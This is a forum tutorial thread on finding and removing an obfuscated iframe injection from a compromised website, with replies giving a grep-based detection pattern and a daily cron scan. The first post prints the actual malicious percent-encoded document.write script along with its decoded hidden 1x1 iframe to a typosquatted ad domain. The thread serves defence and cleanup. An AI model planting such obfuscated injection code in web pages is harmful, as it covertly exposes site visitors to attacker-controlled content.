TUTORIAL: Obfuscated iFrame Injection Attacks

  • wpas
  • Proficient
  • Proficient
  • User avatar
  • Posts: 322
  • Loc: Canada

Post 3+ Months Ago

INTRODUCTION



Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

I had a friend who was a victim of these obfuscated iframe injection attacks. When I tested his site, all tests indicated that his site was clean, but yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some codes that were obfuscated that my friend had no explanation for.

Identifying The Obfuscated iFrame



Doing some research, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

JAVASCRIPT Code: [ Select ]
<Script Language='Javascript'>
<!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
</Script>
  1. <Script Language='Javascript'>
  2. <!--
  3. document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
  4. //-->
  5. </Script>


Researching the issue further I found some websites that were able to deobfuscate, or decrypt, the code at. Just Google "Javascript DeObfuscator" to find the sites.

What you do is copy only the obsfuscated code as shown below:

Code: [ Select ]
%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D


You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

Code: [ Select ]
<iframe src= http: //goooogleadsence.***/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ></iframe>


Notice the spelling "goooogleadsence". Looks strange, doesn't it. By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

CONCLUSION



It is important to remember that not all iframes are bad. Although obfuscation was used to hide the iframe injection, obfuscation can also be used to legitimately hide links such as your download link, or, your PayPal link. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting just to be sure if your are not certain.
  • Anonymous
  • Bot
  • No Avatar
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post 3+ Months Ago

  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13503
  • Loc: Florida

Post 3+ Months Ago

// Edit -- Added -i flag to grep.

Ironically, these obfuscated pieces of code you speak of are easier to spot than just plain code. Whereas with regular code you have to come up with a signature for each exploit, this obfuscated stuff can be found almost universally with something like the following.

BASH Code: [ Select ]
grep -rni '%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}' ./


That "goooogleadsence" certainly is sneaky. At first glance I thought you'd discovered someone trying to perpetrate Adsense click fraud via an <iframe>. I imagine a lot of website owners are going to see something like that and assume it's their Adsense code and ignore it.
  • wpas
  • Proficient
  • Proficient
  • User avatar
  • Posts: 322
  • Loc: Canada

Post 3+ Months Ago

As I had also mentioned, Obfuscation can also be used to legitamely hide download links so you need to be carful before you delete, expecially if you are using someone else's script which is not malicious
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13503
  • Loc: Florida

Post 3+ Months Ago

Yep. That's why I have the -n flag in my grep, so it will show the file which the code is in as well as the line it is on so I can go check it out.

If I don't have any special considerations, I can set that command up to run daily and with a MAILTO setup the cron job will email me the list of files, line numbers, and code excerpts.

If there are certain files which should have such things in them, I can pipe the output through a program which weeds these false positives out before sending any other items along for MAILTO to email me.
  • wpas
  • Proficient
  • Proficient
  • User avatar
  • Posts: 322
  • Loc: Canada

Post 3+ Months Ago

thanks for the info
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13503
  • Loc: Florida

Post 3+ Months Ago

Now I need something that works as simple as grep, but to query database tables with VARCHAR / TEXT / BLOB /etc columns looking for that pattern.

// Edit -- Though, I suppose it would work if I SELECT INTO OUTFILE to backup the database to a non-public directory before the grep executes so it can look there too. But I believe database dumps a lot of times actually use that escaped format for binary data, which could lead to an unmanageable number of false positives. :scratchhead:

Post Information

  • Total Posts in this topic: 6 posts
  • Moderator: Tutorial Writers
  • Users browsing this forum: No registered users and 1 guest
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.